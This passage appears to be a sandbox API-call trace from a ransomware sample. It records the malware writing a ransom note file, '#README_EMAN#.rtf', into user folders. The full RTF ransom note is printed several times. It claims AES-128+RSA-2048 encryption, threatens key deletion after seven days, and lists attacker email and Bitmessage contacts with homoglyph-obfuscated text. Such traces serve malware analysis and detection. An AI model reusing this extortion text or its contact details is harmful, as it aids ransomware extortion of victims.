INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.187] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.187] CloseHandle (hObject=0x2ec) returned 1 [0291.188] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\#readme_eman#.rtf")) returned 0xffffffff [0291.188] GetLastError () returned 0x2 [0291.188] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! 